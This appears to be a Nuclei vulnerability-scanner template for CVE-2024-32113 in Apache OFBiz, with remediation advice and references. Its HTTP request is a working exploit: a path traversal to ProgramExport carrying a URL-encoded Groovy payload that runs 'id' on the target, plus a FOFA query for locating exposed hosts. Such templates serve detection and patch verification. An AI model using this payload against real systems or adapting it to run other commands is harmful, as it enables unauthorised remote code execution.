2024-06-14 16:26:31 +00:00
id : CVE-2024-32113
info :
name : Apache OFBiz Directory Traversal - Remote Code Execution
author : DhiyaneshDK
severity : high
description : |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz : before 18.12.13
2024-06-14 17:55:40 +00:00
remediation : |
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
2024-06-14 16:26:31 +00:00
reference :
- https://issues.apache.org/jira/browse/OFBIZ-13006
- https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
- https://ofbiz.apache.org/download.html
- https://ofbiz.apache.org/security.html
- https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
2024-06-14 17:55:40 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-32113
2024-06-14 16:26:31 +00:00
classification :
2024-06-14 17:55:40 +00:00
cve-id : CVE-2024-32113
2024-06-14 16:26:31 +00:00
epss-score : 0.00115
epss-percentile : 0.45112
metadata :
verified : true
max-request : 1
fofa-query : app="Apache_OFBiz"
tags : cve,cve2024,apache,obiz,rce
http :
- raw :
- |
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);
matchers-condition : and
matchers :
- type : regex
part : body
regex :
2024-06-14 16:28:12 +00:00
- "java.lang.Exception:"
2024-06-14 16:26:31 +00:00
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
condition : and
- type : status
status :
- 200
2024-06-15 12:43:13 +00:00
# digest: 4b0a00483046022100b88041381f7eeda038aa86589d4e8abaa41ddf477aafea6cd9271bdafa02ebb6022100dfb966a119b54853c7b4d4ea44205600d7bf2227910f32cd964a08a2cf91571d:922c64590222798bb761d5b6d8e72950
